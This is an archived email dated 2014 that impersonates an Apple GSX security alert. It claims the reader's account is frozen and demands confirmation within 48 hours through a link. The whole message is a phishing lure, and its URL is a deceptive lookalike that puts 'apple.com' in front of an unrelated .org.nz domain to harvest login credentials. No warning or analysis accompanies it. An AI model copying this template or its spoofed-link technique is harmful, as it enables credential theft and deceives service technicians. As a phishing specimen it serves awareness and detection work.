Your GSX account has been frozen

From: GSX Apple
Date: Tue Aug 05 2014 - 20:35:48 EST

Dear GSX Customer,

This is an automatic message sent by our security system to let you know that you have 48 hours to confirm your account information.

Your GSX account has been frozen because we are unable to validate your account information.

To proceed to confirm your account details please click on the link below and follow the instructions.

http://idmsa.apple.com-idmswebauth-classiclogin.html-appidkey.nzpmgt.org.nz/apple.comIDMSWebAuthclassicLogin.html

We apologise for any inconvenience caused.

Viewable by these GSX Roles: Admin, Apprentice, Manager, Technician